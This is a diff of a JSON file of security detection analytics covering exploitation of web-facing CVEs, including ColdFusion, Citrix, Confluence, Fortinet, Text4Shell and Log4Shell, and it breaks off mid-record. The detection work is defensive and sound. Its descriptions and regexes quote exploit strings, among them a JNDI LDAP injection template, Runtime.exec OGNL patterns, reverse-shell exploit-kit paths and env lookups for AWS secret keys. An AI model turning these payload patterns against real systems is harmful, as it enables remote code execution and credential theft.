\\\nIf a true positive arises, it indicates an active breach attempt, potentially causing data theft, operational disruption, or reputational damage. In essence, this analytic provides a targeted approach to identify attempts exploiting a high-risk ColdFusion vulnerability. While false positives may occur from legitimate accesses, any alerts should be treated as high-priority, warranting immediate investigation to ensure security.", + "search": "| tstats count min(_time) as firstTime max(_time) as lastTime from datamodel=Web where Web.url IN (\"/cf_scripts/scripts/ajax/ckeditor/*\") Web.status=200 by Web.http_user_agent, Web.status Web.http_method, Web.url, Web.url_length, Web.src, Web.dest, sourcetype | `drop_dm_object_name(\"Web\")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `adobe_coldfusion_unauthenticated_arbitrary_file_read_filter`", "tags": { - "name": "Detect F5 TMUI RCE CVE-2020-5902", + "name": "Adobe ColdFusion Unauthenticated Arbitrary File Read", "analytic_story": [ - "F5 TMUI RCE CVE-2020-5902" + "Adobe ColdFusion Arbitrary Code Execution CVE-2023-29298 CVE-2023-26360" ], "asset_type": "Network", "cis20": [ @@ -246491,7 +248406,7 @@ "kill_chain_phases": [ "Delivery" ], - "message": "tbd", + "message": "Possible exploitation of CVE-2023-26360 against $dest$.", "mitre_attack_id": [ "T1190" ], @@ -246501,82 +248416,7 @@ "observable": [ { "name": "dest", - "type": "Other", - "role": [ - "Other" - ] - } - ], - "risk_score": 25, - "security_domain": "network", - "risk_severity": "low", - "mitre_attack_enrichments": [ - { - "mitre_attack_id": "T1190", - "mitre_attack_technique": "Exploit Public-Facing Application", - "mitre_attack_tactics": [ - "Initial Access" - ], - "mitre_attack_groups": [ - "APT28", - "APT29", - "APT39", - "APT41", - "Axiom", - "BackdoorDiplomacy", - "BlackTech", - "Blue Mockingbird", - "Dragonfly", - "Earth Lusca", - "Fox Kitten", - "GALLIUM", - "GOLD SOUTHFIELD", - "HAFNIUM", - "Ke3chang", - "Kimsuky", - "Magic Hound", - "Moses Staff", - "MuddyWater", - "Rocke", - "Threat Group-3390", - "Volatile Cedar", - "menuPass" - ] - } - ] - } - }, - { - "name": "Exploit Public Facing Application via Apache Commons Text", - "description": "The following analytic identifies activity related to Text4Shell, or the critical vulnerability CVE-2022-42889 in Apache Commons Text Library. Apache Commons Text versions 1.5 through 1.9 are affected, but it has been patched in version 1.10. The analytic may need to be tuned for your environment before enabling as a TTP, or direct Notable. Apache Commons Text is a Java library described as a library focused on algorithms working on strings. We can see it as a general-purpose text manipulation toolkit. This vulnerability affects the StringSubstitutor interpolator class, which is included in the Commons Text library. A default interpolator allows for string lookups that can lead to Remote Code Execution. This is due to a logic flaw that makes the script, dns, and url lookup keys interpolated by default, as opposed to what it should be, according to the documentation of the StringLookupFactory class. Those keys allow an attacker to execute arbitrary code via lookups.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Web where Web.http_method IN (POST, GET) by Web.src Web.status Web.uri_path Web.dest Web.http_method Web.uri_query Web.http_user_agent | `drop_dm_object_name(\"Web\")` | eval utf=if(like(lower(uri_query),\"%:utf-8:http%\"),2,0) | eval lookup = if(like(lower(uri_query), \"%url%\") OR like(lower(uri_query), \"%dns%\") OR like(lower(uri_query), \"%script%\"),2,0) | eval other_lookups = if(like(lower(uri_query), \"%env%\") OR like(lower(uri_query), \"%file%\") OR like(lower(uri_query), \"%getRuntime%\") OR like(lower(uri_query), \"%java%\") OR like(lower(uri_query), \"%localhost%\") OR like(lower(uri_query), \"%properties%\") OR like(lower(uri_query), \"%resource%\") OR like(lower(uri_query), \"%sys%\") OR like(lower(uri_query), \"%xml%\") OR like(lower(uri_query), \"%base%\"),1,0) | addtotals fieldname=Score utf lookup other_lookups | fields Score, src, dest, status, uri_query, uri_path, http_method, http_user_agent firstTime lastTime | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | where Score >= 4 | `exploit_public_facing_application_via_apache_commons_text_filter`", - "tags": { - "name": "Exploit Public Facing Application via Apache Commons Text", - "analytic_story": [ - "Text4Shell CVE-2022-42889" - ], - "asset_type": "Web Server", - "cis20": [ - "CIS 13" - ], - "kill_chain_phases": [ - "Installation", - "Delivery" - ], - "message": "A URL was requested related to Text4Shell on $dest$ by $src$.", - "mitre_attack_id": [ - "T1505.003", - "T1505", - "T1190", - "T1133" - ], - "nist": [ - "DE.AE" - ], - "observable": [ - { - "name": "dest", - "type": "IP Address", + "type": "Hostname", "role": [ "Victim" ] @@ -246589,49 +248429,11 @@ ] } ], - "risk_score": 49, + "risk_score": 45, "security_domain": "network", "risk_severity": "low", + "atomic_guid": [], "mitre_attack_enrichments": [ - { - "mitre_attack_id": "T1505.003", - "mitre_attack_technique": "Web Shell", - "mitre_attack_tactics": [ - "Persistence" - ], - "mitre_attack_groups": [ - "APT28", - "APT29", - "APT32", - "APT38", - "APT39", - "BackdoorDiplomacy", - "Deep Panda", - "Dragonfly", - "Fox Kitten", - "GALLIUM", - "HAFNIUM", - "Kimsuky", - "Leviathan", - "Magic Hound", - "Moses Staff", - "OilRig", - "Sandworm Team", - "TEMP.Veles", - "Threat Group-3390", - "Tonto Team", - "Tropic Trooper", - "Volatile Cedar" - ] - }, - { - "mitre_attack_id": "T1505", - "mitre_attack_technique": "Server Software Component", - "mitre_attack_tactics": [ - "Persistence" - ], - "mitre_attack_groups": [] - }, { "mitre_attack_id": "T1190", "mitre_attack_technique": "Exploit Public-Facing Application", @@ -246663,63 +248465,32 @@ "Volatile Cedar", "menuPass" ] - }, - { - "mitre_attack_id": "T1133", - "mitre_attack_technique": "External Remote Services", - "mitre_attack_tactics": [ - "Initial Access", - "Persistence" - ], - "mitre_attack_groups": [ - "APT18", - "APT28", - "APT29", - "APT41", - "Chimera", - "Dragonfly", - "FIN5", - "GALLIUM", - "GOLD SOUTHFIELD", - "Ke3chang", - "Kimsuky", - "LAPSUS$", - "Leviathan", - "OilRig", - "Sandworm Team", - "TEMP.Veles", - "TeamTNT", - "Threat Group-3390", - "Wizard Spider" - ] } ] } }, { - "name": "Exploit Public-Facing Fortinet FortiNAC CVE-2022-39952", - "description": "The following analytic identifies a recent CVE-2022-39952 released publicly where the URI configWizard/keyUpload.jsp recieves a POST with the payload.zip, from there the POC script will schedule a cron to run the payload and contact the remote C2.", - "search": "| tstats count min(_time) as firstTime max(_time) as lastTime from datamodel=Web where Web.url IN (\"*configWizard/keyUpload.jsp*\") by Web.http_user_agent, Web.status Web.http_method, Web.url, Web.url_length, Web.src, Web.dest, sourcetype | `drop_dm_object_name(\"Web\")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `exploit_public_facing_fortinet_fortinac_cve_2022_39952_filter`", + "name": "Citrix ADC Exploitation CVE-2023-3519", + "description": "This analytic is designed to assist in hunting for potential exploitation attempts against Citrix ADC in relation to CVE-2023-3519. This vulnerability, identified within Citrix ADC and NetScaler Gateway, appears to be linked with SAML processing components, with an overflow issue allowing for possible memory corruption. Preliminary findings indicate that for the exploit to be viable, SAML has to be enabled. The analytic targets POST requests to certain web endpoints which have been associated with the exploitation process. \\\nGiven the specific nature of the vulnerability, upon deploying this analytic it is recommended to filter and narrow the focus towards your ADC assets to reduce potential noise and improve the signal of the analytic. Please note that the exploitation of this vulnerability has been reported in the wild, therefore monitoring for potential signs of exploitation should be considered high priority. \\\nThe search query provided examines web data for POST requests made to specific URLs associated with the exploitation of this vulnerability. It aggregates and presents data to highlight potential exploitation attempts, taking into account elements like user agent, HTTP method, URL length, source, and destination. \\\nPlease be aware that this analytic is based on current understanding of the vulnerability, and adjustments may be required as more information becomes available.", + "search": "| tstats count min(_time) as firstTime max(_time) as lastTime from datamodel=Web where Web.url IN (\"*/saml/login\",\"/cgi/samlauth\",\"*/saml/activelogin\",\"/cgi/samlart?samlart=*\",\"*/cgi/logout\") Web.http_method=POST by Web.http_user_agent, Web.status Web.http_method, Web.url, Web.url_length, Web.src, Web.dest, sourcetype | `drop_dm_object_name(\"Web\")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `citrix_adc_exploitation_cve_2023_3519_filter`", "tags": { - "name": "Exploit Public-Facing Fortinet FortiNAC CVE-2022-39952", + "name": "Citrix ADC Exploitation CVE-2023-3519", "analytic_story": [ - "Fortinet FortiNAC CVE-2022-39952" + "Citrix Netscaler ADC CVE-2023-3519" ], "asset_type": "Network", "cis20": [ - "CIS 13" + "CIS 10" ], "kill_chain_phases": [ - "Delivery", - "Installation" + "Delivery" ], - "message": "Potential CVE-2022-39952 against a Fortinet NAC may be occurring against $dest$.", + "message": "Possible expliotation of CVE-2023-3519 against $dest$.", "mitre_attack_id": [ - "T1190", - "T1133" + "T1190" ], "nist": [ - "DE.CM" + "DE.AE" ], "observable": [ { @@ -246730,9 +248501,10 @@ ] } ], - "risk_score": 64, - "security_domain": "network", - "risk_severity": "medium", + "risk_score": 45, + "security_domain": "endpoint", + "risk_severity": "low", + "atomic_guid": [], "mitre_attack_enrichments": [ { "mitre_attack_id": "T1190", @@ -246765,58 +248537,102 @@ "Volatile Cedar", "menuPass" ] - }, + } + ] + } + }, + { + "name": "Citrix ShareFile Exploitation CVE-2023-24489", + "description": "The following analytic detects a potentially malicious file upload attempt to Documentum, an enterprise content management platform, via specific suspicious URLs and the HTTP POST method. This detection occurs through pattern recognition within the datamodel=Web, focusing on URL patterns that follow \"/documentum/upload.aspx?parentid=\", \"/documentum/upload.aspx?filename=\", \"/documentum/upload.aspx?uploadId=*\", combined with the HTTP POST method, indicative of a file upload attempt. \\\nThis behavior is significant for a Security Operations Center (SOC) to identify, as it can signify a potential attack vector. Malicious actors might use this method to upload a harmful script or other exploitable content to Documentum, thereby establishing a foothold in the environment, spreading malware, or enabling further exploitation. \\\nThe impact of this behavior, if a true positive, can be quite significant. An attacker could compromise the Documentum application, manipulate or steal sensitive content, and potentially gain unauthorized access to other system resources. An intrusion of this nature could disrupt business operations, result in data breaches, and even damage the organization's reputation. \\\nHowever, it's important to note that false positives may occur. For example, legitimate but uncommon file uploads might match these URL patterns. It's crucial to verify any alerts generated by this analytic to ensure accurate threat detection. This analytic provides critical insights into potential attack attempts and assists in maintaining the integrity and security of enterprise content management systems like Documentum.", + "search": "| tstats count min(_time) as firstTime max(_time) as lastTime from datamodel=Web where Web.url=\"/documentum/upload.aspx?*\" AND Web.url IN (\"*parentid=*\",\"*filename=*\",\"*uploadId=*\") AND Web.url IN (\"*unzip=*\", \"*raw=*\") Web.http_method=POST by Web.http_user_agent, Web.status Web.http_method, Web.url, Web.url_length, Web.src, Web.dest, sourcetype | `drop_dm_object_name(\"Web\")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `citrix_sharefile_exploitation_cve_2023_24489_filter`", + "tags": { + "name": "Citrix ShareFile Exploitation CVE-2023-24489", + "analytic_story": [ + "Citrix ShareFile RCE CVE-2023-24489" + ], + "asset_type": "Network", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Delivery" + ], + "message": "Possible expliotation of CVE-2023-24489 against $dest$.", + "mitre_attack_id": [ + "T1190" + ], + "nist": [ + "DE.AE" + ], + "observable": [ { - "mitre_attack_id": "T1133", - "mitre_attack_technique": "External Remote Services", + "name": "dest", + "type": "Hostname", + "role": [ + "Victim" + ] + } + ], + "risk_score": 45, + "security_domain": "Network", + "risk_severity": "low", + "atomic_guid": [], + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1190", + "mitre_attack_technique": "Exploit Public-Facing Application", "mitre_attack_tactics": [ - "Initial Access", - "Persistence" + "Initial Access" ], "mitre_attack_groups": [ - "APT18", "APT28", "APT29", + "APT39", "APT41", - "Chimera", + "Axiom", + "BackdoorDiplomacy", + "BlackTech", + "Blue Mockingbird", "Dragonfly", - "FIN5", + "Earth Lusca", + "Fox Kitten", "GALLIUM", "GOLD SOUTHFIELD", + "HAFNIUM", "Ke3chang", "Kimsuky", - "LAPSUS$", - "Leviathan", - "OilRig", - "Sandworm Team", - "TEMP.Veles", - "TeamTNT", + "Magic Hound", + "Moses Staff", + "MuddyWater", + "Rocke", "Threat Group-3390", - "Wizard Spider" + "Volatile Cedar", + "menuPass" ] } ] } }, { - "name": "Fortinet Appliance Auth bypass", - "description": "CVE-2022-40684 is a Fortinet appliance auth bypass that is actively being exploited and a POC is released publicy. The POC adds a SSH key to the appliance. Note that the exploit can be used with any HTTP method (GET, POST, PUT, DELETE, etc). The REST API request failing is not an indication that an attacker was unsuccessful. Horizon3 was able to modify the admin SSH keys though a REST API request that reportedly failed. The collection /api/v2/ endpoints can be used to configure the system and modify the administrator user. Any logs found that meet the above conditions and also have a URL containing /api/v2/ should be cause for concern. Further investigation of any matching log entries can reveal any damage an attack has done. Additionally, an attacker may perform the following actions to further compromise a system Modify the admin SSH key to enable the attacker to login to the compromised system. \\\nAdd new local users. \\\nUpdate networking configurations to reroute traffic. \\\nDownload the system configuration. \\\nInitiate packet captures to capture other sensitive system information. Reference Horizon3.ai", - "search": "| tstats count min(_time) as firstTime max(_time) as lastTime from datamodel=Web where Web.url IN (\"*/api/v2/cmdb/system/admin*\") Web.http_method IN (\"GET\", \"PUT\") by Web.http_user_agent, Web.http_method, Web.url, Web.url_length, Web.src, Web.dest, sourcetype | `drop_dm_object_name(\"Web\")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `fortinet_appliance_auth_bypass_filter`", + "name": "Confluence Unauthenticated Remote Code Execution CVE-2022-26134", + "description": "The following analytic assists with identifying CVE-2022-26134 based exploitation utilizing the Web datamodel to cover network and CIM compliant web logs. The parameters were captured from live scanning and the POC provided by Rapid7. This analytic is written against multiple proof of concept codes released and seen in the wild (scanning). During triage, review any endpoint based logs for further activity including writing a jsp file to disk and commands/processes spawning running as root from the Confluence process.", + "search": "| tstats count min(_time) as firstTime max(_time) as lastTime from datamodel=Web where Web.url IN (\"*${*\", \"*%2F%7B*\") (Web.url=\"*org.apache.commons.io.IOUtils*\" Web.url=\"*java.lang.Runtime@getRuntime().exec*\") OR (Web.url=\"*java.lang.Runtime%40getRuntime%28%29.exec*\") OR (Web.url=\"*getEngineByName*\" AND Web.url=\"*nashorn*\" AND Web.url=\"*ProcessBuilder*\") by Web.http_user_agent Web.http_method, Web.url,Web.url_length Web.src, Web.dest sourcetype | `drop_dm_object_name(\"Web\")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `confluence_unauthenticated_remote_code_execution_cve_2022_26134_filter`", "tags": { - "name": "Fortinet Appliance Auth bypass", + "name": "Confluence Unauthenticated Remote Code Execution CVE-2022-26134", "analytic_story": [ - "CVE-2022-40684 Fortinet Appliance Auth bypass" + "Atlassian Confluence Server and Data Center CVE-2022-26134" ], - "asset_type": "Network", + "asset_type": "Web Server", "cis20": [ "CIS 13" ], "kill_chain_phases": [ - "Delivery", - "Installation" + "Installation", + "Delivery" ], - "message": "Potential CVE-2022-40684 against a Fortinet appliance may be occurring against $dest$.", + "message": "A URL was requested related to CVE-2022-26134, a unauthenticated remote code execution vulnerability, on $dest$ by $src$.", "mitre_attack_id": [ + "T1505", "T1190", "T1133" ], @@ -246826,16 +248642,31 @@ "observable": [ { "name": "dest", - "type": "Hostname", + "type": "IP Address", "role": [ "Victim" ] + }, + { + "name": "src", + "type": "IP Address", + "role": [ + "Attacker" + ] } ], - "risk_score": 81, + "risk_score": 100, "security_domain": "network", "risk_severity": "high", "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1505", + "mitre_attack_technique": "Server Software Component", + "mitre_attack_tactics": [ + "Persistence" + ], + "mitre_attack_groups": [] + }, { "mitre_attack_id": "T1190", "mitre_attack_technique": "Exploit Public-Facing Application", @@ -246901,55 +248732,38 @@ } }, { - "name": "Hunting for Log4Shell", - "description": "The following hunting query assists with quickly assessing CVE-2021-44228, or Log4Shell, activity mapped to the Web Datamodel. This is a combination query attempting to identify, score and dashboard. Because the Log4Shell vulnerability requires the string to be in the logs, this will work to identify the activity anywhere in the HTTP headers using _raw. Modify the first line to use the same pattern matching against other log sources. Scoring is based on a simple rubric of 0-5. 5 being the best match, and less than 5 meant to identify additional patterns that will equate to a higher total score. \\\nThe first jndi match identifies the standard pattern of `{jndi:` \\\njndi_fastmatch is meant to identify any jndi in the logs. The score is set low and is meant to be the \"base\" score used later. \\\njndi_proto is a protocol match that identifies `jndi` and one of `ldap, ldaps, rmi, dns, nis, iiop, corba, nds, http, https.` \\\nall_match is a very well written regex by https://gist.github.com/Schvenn that identifies nearly all patterns of this attack behavior. \\\nenv works to identify environment variables in the header, meant to capture `AWS_ACCESS_KEY_ID`, `AWS_SECRET_ACCESS_KEY` and `env`. \\\nuri_detect is string match looking for the common uri paths currently being scanned/abused in the wild. \\\nkeywords matches on enumerated values that, like `$ctx:loginId`, that may be found in the header used by the adversary. \\\nlookup matching is meant to catch some basic obfuscation that has been identified using upper, lower and date. \\\nScoring will then occur based on any findings. The base score is meant to be 2 , created by jndi_fastmatch. Everything else is meant to increase that score. \\\nFinally, a simple table is created to show the scoring and the _raw field. Sort based on score or columns of interest.", - "search": "| from datamodel Web.Web | eval jndi=if(match(_raw, \"(\\{|%7B)[jJnNdDiI]{4}:\"),4,0) | eval jndi_fastmatch=if(match(_raw, \"[jJnNdDiI]{4}\"),2,0) | eval jndi_proto=if(match(_raw,\"(?i)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http|https):\"),5,0) | eval all_match = if(match(_raw, \"(?i)(%(25){0,}20|\\s)*(%(25){0,}24|\\$)(%(25){0,}20|\\s)*(%(25){0,}7B|{)(%(25){0,}20|\\s)*(%(25){0,}(6A|4A)|J)(%(25){0,}(6E|4E)|N)(%(25){0,}(64|44)|D)(%(25){0,}(69|49)|I)(%(25){0,}20|\\s)*(%(25){0,}3A|:)[\\w\\%]+(%(25){1,}3A|:)(%(25){1,}2F|\\/)[^\\n]+\"),5,0) | eval env_var = if(match(_raw, \"env:\") OR match(_raw, \"env:AWS_ACCESS_KEY_ID\") OR match(_raw, \"env:AWS_SECRET_ACCESS_KEY\"),5,0) | eval uridetect = if(match(_raw, \"(?i)Basic\\/Command\\/Base64|Basic\\/ReverseShell|Basic\\/TomcatMemshell|Basic\\/JBossMemshell|Basic\\/WebsphereMemshell|Basic\\/SpringMemshell|Basic\\/Command|Deserialization\\/CommonsCollectionsK|Deserialization\\/CommonsBeanutils|Deserialization\\/Jre8u20\\/TomcatMemshell|Deserialization\\/CVE_2020_2555\\/WeblogicMemshell|TomcatBypass|GroovyBypass|WebsphereBypass\"),4,0) | eval keywords = if(match(_raw,\"(?i)\\$\\{ctx\\:loginId\\}|\\$\\{map\\:type\\}|\\$\\{filename\\}|\\$\\{date\\:MM-dd-yyyy\\}|\\$\\{docker\\:containerId\\}|\\$\\{docker\\:containerName\\}|\\$\\{docker\\:imageName\\}|\\$\\{env\\:USER\\}|\\$\\{event\\:Marker\\}|\\$\\{mdc\\:UserId\\}|\\$\\{java\\:runtime\\}|\\$\\{java\\:vm\\}|\\$\\{java\\:os\\}|\\$\\{jndi\\:logging/context-name\\}|\\$\\{hostName\\}|\\$\\{docker\\:containerId\\}|\\$\\{k8s\\:accountName\\}|\\$\\{k8s\\:clusterName\\}|\\$\\{k8s\\:containerId\\}|\\$\\{k8s\\:containerName\\}|\\$\\{k8s\\:host\\}|\\$\\{k8s\\:labels.app\\}|\\$\\{k8s\\:labels.podTemplateHash\\}|\\$\\{k8s\\:masterUrl\\}|\\$\\{k8s\\:namespaceId\\}|\\$\\{k8s\\:namespaceName\\}|\\$\\{k8s\\:podId\\}|\\$\\{k8s\\:podIp\\}|\\$\\{k8s\\:podName\\}|\\$\\{k8s\\:imageId\\}|\\$\\{k8s\\:imageName\\}|\\$\\{log4j\\:configLocation\\}|\\$\\{log4j\\:configParentLocation\\}|\\$\\{spring\\:spring.application.name\\}|\\$\\{main\\:myString\\}|\\$\\{main\\:0\\}|\\$\\{main\\:1\\}|\\$\\{main\\:2\\}|\\$\\{main\\:3\\}|\\$\\{main\\:4\\}|\\$\\{main\\:bar\\}|\\$\\{name\\}|\\$\\{marker\\}|\\$\\{marker\\:name\\}|\\$\\{spring\\:profiles.active[0]|\\$\\{sys\\:logPath\\}|\\$\\{web\\:rootDir\\}|\\$\\{sys\\:user.name\\}\"),4,0) | eval obf = if(match(_raw, \"(\\$|%24)[^ /]*({|%7b)[^ /]*(j|%6a)[^ /]*(n|%6e)[^ /]*(d|%64)[^ /]*(i|%69)[^ /]*(:|%3a)[^ /]*(:|%3a)[^ /]*(/|%2f)\"),5,0) | eval lookups = if(match(_raw, \"(?i)({|%7b)(main|sys|k8s|spring|lower|upper|env|date|sd)\"),4,0) | addtotals fieldname=Score, jndi, jndi_proto, env_var, uridetect, all_match, jndi_fastmatch, keywords, obf, lookups | where Score > 2 | stats values(Score) by jndi, jndi_proto, env_var, uridetect, all_match, jndi_fastmatch, keywords, lookups, obf, _raw | `hunting_for_log4shell_filter`", + "name": "Detect F5 TMUI RCE CVE-2020-5902", + "description": "This search detects remote code exploit attempts on F5 BIG-IP, BIG-IQ, and Traffix SDC devices", + "search": "`f5_bigip_rogue` | regex _raw=\"(hsqldb;|.*\\\\.\\\\.;.*)\" | search `detect_f5_tmui_rce_cve_2020_5902_filter`", "tags": { - "name": "Hunting for Log4Shell", + "name": "Detect F5 TMUI RCE CVE-2020-5902", "analytic_story": [ - "Log4Shell CVE-2021-44228", - "CISA AA22-320A" + "F5 TMUI RCE CVE-2020-5902" ], - "asset_type": "Web Server", + "asset_type": "Network", "cis20": [ "CIS 13" ], "kill_chain_phases": [ - "Delivery", - "Installation" + "Delivery" ], - "message": "Hunting for Log4Shell exploitation has occurred.", + "message": "tbd", "mitre_attack_id": [ - "T1190", - "T1133" + "T1190" ], "nist": [ - "DE.AE" + "DE.CM" ], "observable": [ { "name": "dest", - "type": "Hostname", - "role": [ - "Victim" - ] - }, - { - "name": "http_method", - "type": "Other", - "role": [ - "Other" - ] - }, - { - "name": "src", "type": "Other", "role": [ "Other" ] } ], - "risk_score": 40, + "risk_score": 25, "security_domain": "network", "risk_severity": "low", "mitre_attack_enrichments": [ @@ -246984,60 +248798,31 @@ "Volatile Cedar", "menuPass" ] - }, - { - "mitre_attack_id": "T1133", - "mitre_attack_technique": "External Remote Services", - "mitre_attack_tactics": [ - "Initial Access", - "Persistence" - ], - "mitre_attack_groups": [ - "APT18", - "APT28", - "APT29", - "APT41", - "Chimera", - "Dragonfly", - "FIN5", - "GALLIUM", - "GOLD SOUTHFIELD", - "Ke3chang", - "Kimsuky", - "LAPSUS$", - "Leviathan", - "OilRig", - "Sandworm Team", - "TEMP.Veles", - "TeamTNT", - "Threat Group-3390", - "Wizard Spider" - ] } ] } }, { - "name": "Log4Shell JNDI Payload Injection Attempt", - "description": "CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", - "search": "| from datamodel Web.Web | regex _raw=\"[jJnNdDiI]{4}(\\:|\\%3A|\\/|\\%2F)\\w+(\\:\\/\\/|\\%3A\\%2F\\%2F)(\\$\\{.*?\\}(\\.)?)?\" | fillnull | stats count by action, category, dest, dest_port, http_content_type, http_method, http_referrer, http_user_agent, site, src, url, url_domain, user | `log4shell_jndi_payload_injection_attempt_filter`", + "name": "Exploit Public Facing Application via Apache Commons Text", + "description": "The following analytic identifies activity related to Text4Shell, or the critical vulnerability CVE-2022-42889 in Apache Commons Text Library. Apache Commons Text versions 1.5 through 1.9 are affected, but it has been patched in version 1.10. The analytic may need to be tuned for your environment before enabling as a TTP, or direct Notable. Apache Commons Text is a Java library described as a library focused on algorithms working on strings. We can see it as a general-purpose text manipulation toolkit. This vulnerability affects the StringSubstitutor interpolator class, which is included in the Commons Text library. A default interpolator allows for string lookups that can lead to Remote Code Execution. This is due to a logic flaw that makes the script, dns, and url lookup keys interpolated by default, as opposed to what it should be, according to the documentation of the StringLookupFactory class. Those keys allow an attacker to execute arbitrary code via lookups.", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Web where Web.http_method IN (POST, GET) by Web.src Web.status Web.uri_path Web.dest Web.http_method Web.uri_query Web.http_user_agent | `drop_dm_object_name(\"Web\")` | eval utf=if(like(lower(uri_query),\"%:utf-8:http%\"),2,0) | eval lookup = if(like(lower(uri_query), \"%url%\") OR like(lower(uri_query), \"%dns%\") OR like(lower(uri_query), \"%script%\"),2,0) | eval other_lookups = if(like(lower(uri_query), \"%env%\") OR like(lower(uri_query), \"%file%\") OR like(lower(uri_query), \"%getRuntime%\") OR like(lower(uri_query), \"%java%\") OR like(lower(uri_query), \"%localhost%\") OR like(lower(uri_query), \"%properties%\") OR like(lower(uri_query), \"%resource%\") OR like(lower(uri_query), \"%sys%\") OR like(lower(uri_query), \"%xml%\") OR like(lower(uri_query), \"%base%\"),1,0) | addtotals fieldname=Score utf lookup other_lookups | fields Score, src, dest, status, uri_query, uri_path, http_method, http_user_agent firstTime lastTime | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | where Score >= 4 | `exploit_public_facing_application_via_apache_commons_text_filter`", "tags": { - "name": "Log4Shell JNDI Payload Injection Attempt", + "name": "Exploit Public Facing Application via Apache Commons Text", "analytic_story": [ - "Log4Shell CVE-2021-44228", - "CISA AA22-257A", - "CISA AA22-320A" + "Text4Shell CVE-2022-42889" ], - "asset_type": "Endpoint", + "asset_type": "Web Server", "cis20": [ - "CIS 10" + "CIS 13" ], "kill_chain_phases": [ - "Delivery", - "Installation" + "Installation", + "Delivery" ], - "message": "CVE-2021-44228 Log4Shell triggered for host $dest$", + "message": "A URL was requested related to Text4Shell on $dest$ by $src$.", "mitre_attack_id": [ + "T1505.003", + "T1505", "T1190", "T1133" ], @@ -247046,24 +248831,63 @@ ], "observable": [ { - "name": "user", - "type": "User", + "name": "dest", + "type": "IP Address", "role": [ "Victim" ] }, { - "name": "dest", - "type": "Hostname", + "name": "src", + "type": "IP Address", "role": [ - "Victim" + "Attacker" ] } ], - "risk_score": 15, - "security_domain": "threat", + "risk_score": 49, + "security_domain": "network", "risk_severity": "low", "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1505.003", + "mitre_attack_technique": "Web Shell", + "mitre_attack_tactics": [ + "Persistence" + ], + "mitre_attack_groups": [ + "APT28", + "APT29", + "APT32", + "APT38", + "APT39", + "BackdoorDiplomacy", + "Deep Panda", + "Dragonfly", + "Fox Kitten", + "GALLIUM", + "HAFNIUM", + "Kimsuky", + "Leviathan", + "Magic Hound", + "Moses Staff", + "OilRig", + "Sandworm Team", + "TEMP.Veles", + "Threat Group-3390", + "Tonto Team", + "Tropic Trooper", + "Volatile Cedar" + ] + }, + { + "mitre_attack_id": "T1505", + "mitre_attack_technique": "Server Software Component", + "mitre_attack_tactics": [ + "Persistence" + ], + "mitre_attack_groups": [] + }, { "mitre_attack_id": "T1190", "mitre_attack_technique": "Exploit Public-Facing Application", @@ -247129,39 +248953,31 @@ } }, { - "name": "Log4Shell JNDI Payload Injection with Outbound Connection", - "description": "CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we match the invocation function with a network connection to a malicious ip address.", - "search": "| from datamodel Web.Web | rex field=_raw max_match=0 \"[jJnNdDiI]{4}(\\:|\\%3A|\\/|\\%2F)(?\\w+)(\\:\\/\\/|\\%3A\\%2F\\%2F)(\\$\\{.*?\\}(\\.)?)?(?[a-zA-Z0-9\\.\\-\\_\\$]+)\" | join affected_host type=inner [| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Network_Traffic.All_Traffic by All_Traffic.dest | `drop_dm_object_name(All_Traffic)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | rename dest AS affected_host] | fillnull | stats count by action, category, dest, dest_port, http_content_type, http_method, http_referrer, http_user_agent, site, src, url, url_domain, user | `log4shell_jndi_payload_injection_with_outbound_connection_filter`", + "name": "Exploit Public-Facing Fortinet FortiNAC CVE-2022-39952", + "description": "The following analytic identifies a recent CVE-2022-39952 released publicly where the URI configWizard/keyUpload.jsp recieves a POST with the payload.zip, from there the POC script will schedule a cron to run the payload and contact the remote C2.", + "search": "| tstats count min(_time) as firstTime max(_time) as lastTime from datamodel=Web where Web.url IN (\"*configWizard/keyUpload.jsp*\") by Web.http_user_agent, Web.status Web.http_method, Web.url, Web.url_length, Web.src, Web.dest, sourcetype | `drop_dm_object_name(\"Web\")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `exploit_public_facing_fortinet_fortinac_cve_2022_39952_filter`", "tags": { - "name": "Log4Shell JNDI Payload Injection with Outbound Connection", + "name": "Exploit Public-Facing Fortinet 